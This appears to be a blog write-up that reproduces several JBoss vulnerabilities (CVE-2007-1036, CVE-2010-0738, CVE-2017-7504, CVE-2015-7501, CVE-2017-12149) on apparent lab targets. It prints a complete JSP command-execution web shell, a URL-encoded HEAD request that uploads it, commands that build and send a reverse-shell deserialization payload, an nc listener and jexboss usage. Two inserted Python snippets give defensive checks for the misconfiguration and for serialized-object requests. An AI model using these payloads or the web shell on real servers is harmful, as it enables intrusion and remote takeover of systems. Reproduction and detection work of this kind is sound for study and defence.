JBoss Vulnerability Roundup

JBoss vulnerability reproduction

jmx-console


After discovering the admin console, access it directly and then try to deploy a WAR package.


Exploitation successful.

jboss-WeakPasswd

When accessing the console, it prompts for a login. Try:

admin/admin


The remaining steps are the same as above.

CVE-2007-1036

0x00 Vulnerability overview

This vulnerability exists because the /jmx-console/HtmlAdaptor path in JBoss is exposed externally without any authentication, so an attacker can enter the JMX console and invoke any operation in it. The exploit uses the jboss.admin -> DeploymentFileRepository -> store() method in the console: by passing values to its four parameters a shell can be uploaded, where arg0 is the name of the deployed WAR package, arg1 the file name of the uploaded file, arg2 the file extension, and arg3 the content of the uploaded file. Controlling these four parameters is enough to upload a shell and control the whole server. Experiments also show that arg1 and arg2 are concatenated, e.g. arg1=she and arg2=ll.jsp: the server still joins them and writes shell.jsp to the specified path.

0x01 Affected versions

JBoss 4.x and below

0x02 Exploitation

Use the payload

http://xx.xx.xx.xx/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.admin:service=DeploymentFileRepository

p1   job1.war
p2 job1
p3 .jsp
p4 <%@ page import="java.io.*" %>
<% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s +"\r\n"; } } catch(IOException e) { e.printStackTrace(); } } out.println(output);%>

Fill in the corresponding fields.


Access successful.

CVE-2010-0738

0x00 Vulnerability overview

The exploitation principle is the same as CVE-2007-1036, except that a HEAD request is used to bypass the authentication restriction that is only applied to GET and POST requests.

0x01 Affected versions

JBoss 4.2.0 to JBoss 4.3.0

0x02

Payload
HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=../jmx-console.war/&arg1=shell&arg2=.jsp&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%69%6f%2e%2a%22%20%25%3e%20%0d%0a%3c%25%20%53%74%72%69%6e%67%20%63%6d%64%20%3d%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6d%64%22%29%3b%20%53%74%72%69%6e%67%20%6f%75%74%70%75%74%20%3d%20%22%22%3b%20%69%66%28%63%6d%64%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%53%74%72%69%6e%67%20%73%20%3d%20%6e%75%6c%6c%3b%20%74%72%79%20%7b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%63%6d%64%29%3b%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%73%49%20%3d%20%6e%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6e%65%77%20%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%20%77%68%69%6c%65%28%28%73%20%3d%20%73%49%2e%72%65%61%64%4c%69%6e%65%28%29%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%70%75%74%20%2b%3d%20%73%20%2b%22%5c%72%5c%6e%22%3b%20%7d%20%7d%20%63%61%74%63%68%28%49%4f%45%78%63%65%70%74%69%6f%6e%20%65%29%20%7b%20%65%2e%70%72%69%6e%74%53%74%61%63%6b%54%72%61%63%65%28%29%3b%20%7d%20%7d%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%6f%75%74%70%75%74%29%3b%25%3e&arg4=True HTTP/1.1
Host: target.yijinglab.com:51783
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,la;q=0.8,en;q=0.7
Connection: close

Try accessing

target.yijinglab.com:51783/jmx-console/shell.jsp?cmd=id

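The HEAD bypass above comes down to a security-constraint on the jmx-console that only lists GET and POST. As an added example (not from the original post), this Python check reads a jmx-console web.xml and reports which HTTP methods fall outside every auth-constraint; both web.xml fragments are constructed, and the check assumes a single url-pattern of /*.

```python
import xml.etree.ElementTree as ET

ALL_METHODS = ("GET", "POST", "HEAD", "PUT", "DELETE", "OPTIONS", "TRACE")

# Constructed jmx-console web.xml fragment shaped like the configuration that
# CVE-2010-0738 abused: only GET and POST are named, so a HEAD request reaches
# HtmlAdaptor with no authentication at all.
WEAK_WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
</web-app>"""

# Corrected version: with no <http-method> elements the servlet container applies
# the constraint to every HTTP method, so HEAD is authenticated just like GET.
FIXED_WEB_XML = WEAK_WEB_XML.replace(
    "      <http-method>GET</http-method>\n      <http-method>POST</http-method>\n", "")


def _local(tag: str) -> str:
    """Strip an XML namespace prefix so real web.xml files (xmlns=...) also parse."""
    return tag.rsplit("}", 1)[-1]


def unprotected_methods(web_xml: str) -> list[str]:
    """Return the HTTP methods that no auth-constraint covers for url-pattern /*."""
    root = ET.fromstring(web_xml)
    covered: set[str] = set()
    for sc in root.iter():
        if _local(sc.tag) != "security-constraint":
            continue
        # A constraint without <auth-constraint> gates nothing, so skip it
        if not any(_local(c.tag) == "auth-constraint" for c in sc):
            continue
        for wrc in sc:
            if _local(wrc.tag) != "web-resource-collection":
                continue
            listed = [m.text.strip().upper() for m in wrc if _local(m.tag) == "http-method"]
            if not listed:
                return []  # no method list means every method is protected
            covered.update(listed)
    return [m for m in ALL_METHODS if m not in covered]


if __name__ == "__main__":
    print("weak  :", unprotected_methods(WEAK_WEB_XML))
    print("fixed :", unprotected_methods(FIXED_WEB_XML))
```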

CVE-2017-7504

0x00 Reproduction

Visiting http://ip:port/invoker/JMXInvokerServlet returns a response showing that the interface is exposed, and this interface is vulnerable.

When accessed, it triggers a file download, which indicates the corresponding vulnerability exists.

0x01 Exploitation with JavaDeserH2HC
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port

Start a listener; the port must match the one set above.
nc -lvvp port

Try accessing
curl http://xx.xx.xx.xx:8080/invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser


CVE-2015-7501

0x00

Basically the same as above; only the interface used differs.
curl http://xx.xx.xx.xx:8080/invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

CVE-2017-12149

0x00 Vulnerability discovery

Visit http://ip:port/invoker/readonly; if it returns an error page with status code 500 as shown below, the vulnerability exists.

Confirmed present.

0x01

curl http://IP地址:端口/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

Use the corresponding interface to trigger the deserialization.
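Every endpoint in the CVE-2017-7504, CVE-2015-7501 and CVE-2017-12149 sections receives a raw Java serialized object in the request body. As an added example (not part of the original writeup), this Python filter flags such requests by endpoint path, by the 0xACED0005 stream header, and by a commons-collections class name in the stream; the sample payload is constructed and is not a working gadget chain.

```python
from urllib.parse import urlsplit

# Java serialization stream header: STREAM_MAGIC 0xACED, STREAM_VERSION 0x0005
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"

# JBoss servlets covered by this writeup that deserialize the raw request body
INVOKER_PATHS = ("/invoker/jmxinvokerservlet", "/invoker/readonly")

# Class descriptors are stored in plaintext inside a serialized stream, so the
# commons-collections gadget library used by JavaDeserH2HC shows up by name
GADGET_MARKERS = (b"org.apache.commons.collections",)


def inspect_request(method: str, target: str, body: bytes) -> list[str]:
    """Return findings for one HTTP request (method, request-target, raw body)."""
    findings = []
    path = urlsplit(target).path.lower()
    if any(path.startswith(p) for p in INVOKER_PATHS):
        findings.append("jboss-invoker-endpoint")
    if body.startswith(JAVA_SERIAL_MAGIC):
        findings.append("java-serialized-body")
    if any(marker in body for marker in GADGET_MARKERS):
        findings.append("commons-collections-gadget")
    return findings


def should_block(findings: list[str]) -> bool:
    """Block when a serialized Java object reaches an invoker endpoint, whatever the method."""
    return "jboss-invoker-endpoint" in findings and "java-serialized-body" in findings


# Constructed sample: stream header, TC_OBJECT, TC_CLASSDESC and a class name
# (length-prefixed UTF) from commons-collections. Not a real gadget chain.
CONSTRUCTED_PAYLOAD = (JAVA_SERIAL_MAGIC + b"\x73\x72\x00\x2a"
                       + b"org.apache.commons.collections.map.LazyMap" + b"\x00" * 8)
BENIGN_BODY = b"username=alice&password=secret"

if __name__ == "__main__":
    samples = {"constructed attack": ("POST", "/invoker/readonly", CONSTRUCTED_PAYLOAD),
               "benign form post": ("POST", "/login", BENIGN_BODY)}
    for name, req in samples.items():
        found = inspect_request(*req)
        print(f"{name}: findings={found} block={should_block(found)}")
```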

CVE-2017-12149 JBoss AS 5.X/6.X deserialization vulnerability

0x00 Information gathering

Since the IP is already known, there is not much to gather; only the port information needs to be collected.

Port 8080 is found; try accessing it.

Scan with jbossScan.

CVE-2017-12149 is reported as present.

A 500 response appears, indicating the vulnerability exists.

0x01

Attempt exploitation.

This problem appeared while generating the serialized payload; try switching the Java version, then run it again.

Access

curl http://目标IP:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

Try jexboss
python3 jexboss.py -u http://10.1.1.121:8080

Reverse shell received successfully.

Source: https://tsy244.github.io/2024/02/09/整理/jboss漏洞整理/
Author: August Rosenberg
Posted on: February 9, 2024